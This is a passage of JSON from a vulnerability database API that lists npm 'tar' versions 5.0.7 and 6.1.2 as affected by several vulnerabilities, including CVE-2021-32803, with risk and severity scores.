"VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-7mtb-yaq7-77ep" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-fqmy-jhdk-xfhw" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-m4hj-dq8q-67f6" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" }, { "vulnerability": "VCID-yy79-dbn9-7bd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@5.0.7" }, { "url": "http://public2.vulnerablecode.io/api/packages/37947?format=api", "purl": "pkg:npm/tar@6.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1tz4-bphw-rbd3" }, { "vulnerability": "VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-7mtb-yaq7-77ep" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-fqmy-jhdk-xfhw" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-m4hj-dq8q-67f6" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" }, { "vulnerability": "VCID-yy79-dbn9-7bd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@6.1.2" } ], "aliases": [ "CVE-2021-32803", "GHSA-r628-mhmh-qjhw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e7n4-x8sc-3bb6" } ], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@6.1.2" }